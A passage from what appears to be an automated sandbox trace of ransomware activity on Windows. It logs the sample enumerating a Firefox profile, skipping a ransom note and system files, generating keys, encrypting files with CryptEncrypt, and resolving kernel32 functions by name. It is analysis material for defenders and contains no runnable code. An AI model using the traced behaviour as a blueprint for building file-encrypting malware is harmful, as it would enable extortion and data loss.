lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=229640) returned 1 [0184.069] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.070] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.071] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.071] CloseHandle (hObject=0x288) returned 1 [0184.071] CloseHandle (hObject=0x284) returned 1 [0184.071] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.071] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5ad4bf0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5ad4bf0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac7027e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x80108, dwReserved0=0x0, dwReserved1=0x0, cFileName="cookies.sqlite.VAtSvR", cAlternateFileName="COOKIE~1.VAT")) returned 1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="DECRYPT-FILES.txt") returned -1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="autorun.inf") returned 1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="boot.ini") returned 1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="desktop.ini") returned -1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="ntuser.dat") returned -1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="iconcache.db") returned -1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="bootsect.bak") returned 1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="ntuser.dat.log") returned -1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="thumbs.db") returned -1 [0184.071] lstrcmpiW (lpString1="cookies.sqlite.VAtSvR", lpString2="Bootfont.bin") returned 1 [0184.071] lstrlenW (lpString="cookies.sqlite.VAtSvR") returned 21 [0184.071] lstrcmpiW (lpString1="VAtSvR", lpString2="lnk") returned 1 [0184.071] lstrcmpiW (lpString1="VAtSvR", lpString2="exe") returned 1 [0184.071] lstrcmpiW (lpString1="VAtSvR", lpString2="sys") returned 1 [0184.071] lstrcmpiW (lpString1="VAtSvR", lpString2="dll") returned 1 [0184.071] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.071] lstrlenW (lpString="cookies.sqlite.VAtSvR") returned 21 [0184.072] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.072] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="cookies.sqlite.VAtSvR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.VAtSvR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.VAtSvR" [0184.072] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.072] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\cookies.sqlite.VAtSvR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\cookies.sqlite.vatsvr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.072] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=524552) returned 1 [0184.072] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.072] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x2b30000 [0184.073] UnmapViewOfFile (lpBaseAddress=0x2b30000) returned 1 [0184.073] CloseHandle (hObject=0x288) returned 1 [0184.073] CloseHandle (hObject=0x284) returned 1 [0184.073] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.073] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xac3bc9a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xac3bc9a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xac3bc9a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.074] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.074] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbc374ed0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbc374ed0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac7c0ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18108, dwReserved0=0x0, dwReserved1=0x0, cFileName="downloads.sqlite.2fGbR", cAlternateFileName="DOWNLO~1.2FG")) returned 1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="DECRYPT-FILES.txt") returned 1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="autorun.inf") returned 1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="boot.ini") returned 1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="desktop.ini") returned 1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="ntuser.dat") returned -1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="iconcache.db") returned -1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="bootsect.bak") returned 1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="ntuser.dat.log") returned -1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="thumbs.db") returned -1 [0184.074] lstrcmpiW (lpString1="downloads.sqlite.2fGbR", lpString2="Bootfont.bin") returned 1 [0184.074] lstrlenW (lpString="downloads.sqlite.2fGbR") returned 22 [0184.074] lstrcmpiW (lpString1="2fGbR", lpString2="lnk") returned -1 [0184.074] lstrcmpiW (lpString1="2fGbR", lpString2="exe") returned -1 [0184.074] lstrcmpiW (lpString1="2fGbR", lpString2="sys") returned -1 [0184.074] lstrcmpiW (lpString1="2fGbR", lpString2="dll") returned -1 [0184.074] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.074] lstrlenW (lpString="downloads.sqlite.2fGbR") returned 22 [0184.074] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.074] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="downloads.sqlite.2fGbR" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.2fGbR") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.2fGbR" [0184.074] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\downloads.sqlite.2fGbR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\downloads.sqlite.2fgbr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.075] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=98568) returned 1 [0184.075] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.075] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.088] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.088] CloseHandle (hObject=0x288) returned 1 [0184.088] CloseHandle (hObject=0x284) returned 1 [0184.088] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.091] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb4b81e50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb4b81e50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac7e7020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x195, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensions.ini.tH2DB", cAlternateFileName="EXTENS~1.TH2")) returned 1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="DECRYPT-FILES.txt") returned 1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="autorun.inf") returned 1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="boot.ini") returned 1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="desktop.ini") returned 1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="ntuser.dat") returned -1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="iconcache.db") returned -1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="bootsect.bak") returned 1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="ntuser.dat.log") returned -1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="thumbs.db") returned -1 [0184.091] lstrcmpiW (lpString1="extensions.ini.tH2DB", lpString2="Bootfont.bin") returned 1 [0184.091] lstrlenW (lpString="extensions.ini.tH2DB") returned 20 [0184.091] lstrcmpiW (lpString1="tH2DB", lpString2="lnk") returned 1 [0184.091] lstrcmpiW (lpString1="tH2DB", lpString2="exe") returned 1 [0184.091] lstrcmpiW (lpString1="tH2DB", lpString2="sys") returned 1 [0184.091] lstrcmpiW (lpString1="tH2DB", lpString2="dll") returned 1 [0184.091] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.091] lstrlenW (lpString="extensions.ini.tH2DB") returned 20 [0184.091] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.091] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.ini.tH2DB" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB" [0184.091] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.th2db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.092] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=405) returned 1 [0184.092] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0184.092] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.092] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0184.092] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0184.092] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.093] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0184.093] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0184.093] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.094] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.094] CloseHandle (hObject=0x288) returned 1 [0184.094] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.094] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0184.095] CloseHandle (hObject=0x0) returned 0 [0184.095] CloseHandle (hObject=0x284) returned 1 [0184.095] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.095] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.095] GetTickCount () returned 0x1135458 [0184.095] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.096] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0184.096] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0184.096] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0184.096] lstrlenA (lpString="kernel32.dll") returned 12 [0184.096] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0184.096] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0184.096] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0184.096] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0184.096] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0184.096] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0184.096] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0184.096] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0184.097] lstrlenA (lpString="ADDATOMA") returned 8 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0184.097] lstrlenA (lpString="ADDATOMW") returned 8 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0184.097] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0184.097] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0184.097] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0184.097] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0184.097] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0184.097] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0184.097] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0184.097] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0184.097] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0184.097] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0184.097] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0184.097] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0184.097] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0184.097] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0184.097] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0184.098] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0184.098] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0184.098] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0184.098] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0184.098] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0184.098] lstrlenA (lpString="BACKUPREAD") returned 10 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0184.098] lstrlenA (lpString="BACKUPSEEK") returned 10 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0184.098] lstrlenA (lpString="BACKUPWRITE") returned 11 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0184.098] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0184.098] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0184.098] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0184.098] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0184.098] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0184.098] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0184.098] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0184.098] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0184.098] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0184.098] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0184.098] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0184.099] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0184.099] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0184.099] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0184.099] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0184.099] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0184.099] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0184.099] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0184.099] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0184.099] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: 